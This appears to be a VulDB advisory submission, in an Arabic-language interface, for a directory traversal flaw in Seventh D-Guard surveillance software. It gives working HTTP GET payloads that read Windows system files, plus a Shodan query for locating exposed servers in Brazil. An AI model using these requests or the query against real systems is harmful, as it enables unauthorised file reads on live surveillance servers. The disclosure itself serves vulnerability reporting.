| عنوان | Seventh D-Guard NA Path Traversal |
|---|
| الوصف | URL Vendor: https://www.seventh.com.br/
Product:
https://www.seventh.com.br/solucoes/projetos-de-monitoramento/videomonitoramento
https://www.seventh.com.br/suporte/dispositivos-integrados/dguard
Directory Traversal is a vulnerability which allows attackers to access restricted directories and read files outside of the web server's root directory.
GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Readind /etc/hosts
GET /../../../../../../../../Windows/System32/Drivers/Etc/hosts HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Shodan Query:
https://www.shodan.io/search?query=Title%3A%22Web%22+Content-Length%3A+21928+country%3A%22BR%22+Content-Type%3A+text%2Fhtml%3B+charset%3DISO-8859-1&page=3
|
|---|
| المستخدم | c4ng4c3ir0 (UID 38456) |
|---|
| ارسال | 06/02/2025 06:29 PM (1 سنة منذ) |
|---|
| الاعتدال | 15/02/2025 04:31 PM (9 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 295965 [Seventh D-Guard حتى 20250206 HTTP GET Request اجتياز الدليل] |
|---|
| النقاط | 17 |
|---|